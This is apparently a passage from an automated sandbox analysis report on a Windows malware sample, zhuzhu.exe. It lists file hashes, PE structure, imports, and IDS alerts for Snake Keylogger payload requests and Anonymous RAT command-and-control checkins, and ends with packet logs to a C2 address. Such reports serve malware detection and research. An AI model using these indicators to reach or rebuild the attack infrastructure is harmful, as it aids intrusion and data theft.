                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                    Entropy (8bit):4.465636444072328
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:ZIXfpi67eLPU9skLmb0b4wWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb8:qXD94wWlLZMM6YFHf+8
                                                                                                                                                                    MD5:4D0FA019644621173BF30EE2E5F0D7A5
                                                                                                                                                                    SHA1:9EC73E6923D5E6AA834CB29AD3271F30165D5D85
                                                                                                                                                                    SHA-256:F36AB6C525BBA0EFD3EEB3B46C2AAC4393BE5FF850DDC519399BB8C664A4EE6E
                                                                                                                                                                    SHA-512:A69252CE84E87E62542852190CDF726B96768571DF05D08D675716048E99E0D2F4D5EA5837E2FF44AC5E745396AF066ECC61564458DF550A075FDF520352C281
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:GLS_BINARY_LSB_FIRST
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4697
                                                                                                                                                                    Entropy (8bit):7.794032055726917
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:PXL+TRk2HuR0kbc4kKpefCQsdUIGTAvksU3vxZDYUbkh3oh:PXLH2jkPPxQ6A8k33vx9GhYh
                                                                                                                                                                    MD5:D56BDECDB16ED5ED496FFBFEB49FDA4B
                                                                                                                                                                    SHA1:D031F3D283CF1083BB9D1705E82C5D84F42C78EE
                                                                                                                                                                    SHA-256:B0F3E7D8D3112C7F64FE6A7F4264F0D79AAB045D8CA13AE26F62F32262D5C42A
                                                                                                                                                                    SHA-512:0D48934A0A78A98CBAF028D12EF4EC7019D9F96B3E1DE3A0422F4DA448B3BEA9B9C5123C2C6F32CE8E6ED70507409FE18F8BB11B78DC729C6C2342885CC9DBF6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.174885705168195
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 92.26%
                                                                                                                                                                    • Win32 Executable Borland Delphi 7 (665061/41) 6.13%
                                                                                                                                                                    • Inno Setup installer (109748/4) 1.01%
                                                                                                                                                                    • InstallShield setup (43055/19) 0.40%
                                                                                                                                                                    • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                                                    File name:zhuzhu.exe
                                                                                                                                                                    File size:6'061'056 bytes
                                                                                                                                                                    MD5:675f03db23d403573a3a6f708a0e4369
                                                                                                                                                                    SHA1:78ee9afafe6bf18d2c42d816629b6f9ed1e3ea2f
                                                                                                                                                                    SHA256:ee4c8a187e1e1bd62abe49faece1f327dc7718c736dd1e427c025d73fa796cf8
                                                                                                                                                                    SHA512:c9055873fcbcefd7aeb8414627d4aa7645014bc2a609a4993317a45465a2ffdbeb38dbfb6c7677350203fe1e7d1f3906fc670ae74d1a75fbd91533044f513240
                                                                                                                                                                    SSDEEP:98304:unsmtk2asgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvD:wL8Z9HhxRVwJMAqoetRqA9D
                                                                                                                                                                    TLSH:7756BF61B682C832C1231A78DD1B93E5A875BF315F246987BBF53E0C7E3D5523828297
                                                                                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                    Icon Hash:dd9d5b5252b5b513
                                                                                                                                                                    Entrypoint:0x49ab80
                                                                                                                                                                    Entrypoint Section:CODE
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                                                                    Instruction
                                                                                                                                                                    push ebp
                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                    add esp, FFFFFFF0h
                                                                                                                                                                    mov eax, 0049A778h
                                                                                                                                                                    call 00007F9C7CDEFD5Dh
                                                                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                    call 00007F9C7CE436A5h
                                                                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                    mov edx, 0049ABE0h
                                                                                                                                                                    call 00007F9C7CE432A4h
                                                                                                                                                                    mov ecx, dword ptr [0049DBDCh]
                                                                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                    mov edx, dword ptr [00496590h]
                                                                                                                                                                    call 00007F9C7CE43694h
                                                                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                    call 00007F9C7CE43708h
                                                                                                                                                                    call 00007F9C7CDED83Bh
                                                                                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x51d248 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x51d248 | 0x51d400 | d3af718b802a6350311023a10c38abea | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.09943714821763602
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6
RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286
                                                                                                                                                                    RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                                                                                    RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                                                                                    RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                                                                                    RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                                                                                    RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                                                                                    RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                                                                                    RT_RCDATA0xb8e040x10data1.5
                                                                                                                                                                    RT_RCDATA0xb8e140x50b518PE32 executable (GUI) Intel 80386, for MS Windows0.4693317413330078
                                                                                                                                                                    RT_RCDATA0x5c432c0x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                                                                                    RT_RCDATA0x5c43300x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                                                                                    RT_RCDATA0x5c7f300x64cdata0.5998759305210918
                                                                                                                                                                    RT_RCDATA0x5c857c0x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                                                                                    RT_RCDATA0x5c86d00x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccea40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                    RT_GROUP_CURSOR0x5cceb80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccecc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccee00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccef40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccf080x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_CURSOR0x5ccf1c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                    RT_GROUP_ICON0x5ccf300x14dataTurkishTurkey1.1
                                                                                                                                                                    RT_VERSION0x5ccf440x304dataTurkishTurkey0.42875647668393785
| DLL | Import |
| --- | --- |
| kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle |
| user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges |
| kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt |
| user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| ole32.dll | CLSIDFromString |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit |
| ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize |
| oleaut32.dll | GetErrorInfo, SysFreeString |
| comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create |
| shell32.dll | ShellExecuteExA, ExtractIconExW |
| wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle |
| shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder |
| advapi32.dll | OpenSCManagerA, CloseServiceHandle |
| wsock32.dll | WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa |
| netapi32.dll | Netbios |

| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| Turkish | Turkey | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-12-30T04:59:08.131786+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49738 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:08.153938+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49739 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:08.668250+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.4 | 49743 | 69.42.215.252 | 80 | TCP |
| 2024-12-30T04:59:09.101725+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49744 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:09.187702+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49746 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:10.329717+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49750 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:11.024552+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49754 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:11.404430+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49756 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:11.886897+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49766 | 118.107.44.219 | 19091 | TCP |
| 2024-12-30T04:59:12.203541+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49759 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:12.394110+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49764 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:13.211852+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49770 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:13.368014+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49772 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:14.033979+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49776 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:14.034144+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49778 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:15.092751+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49782 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:15.117270+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49781 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:16.176639+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49786 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:16.195952+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49787 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T04:59:17.159058+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.4 | 49794 | 142.250.181.238 | 443 | TCP |
| 2024-12-30T05:00:28.548302+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49785 | 118.107.44.219 | 19091 | TCP |
| 2024-12-30T05:01:45.453960+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 50264 | 118.107.44.219 | 19091 | TCP |
| 2024-12-30T05:02:54.328175+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 50265 | 118.107.44.219 | 19092 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                    Dec 30, 2024 04:58:59.993370056 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.993747950 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993758917 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993771076 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993783951 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993797064 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.993827105 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.994314909 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.994327068 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.994338036 CET885349730118.107.44.219192.168.2.4
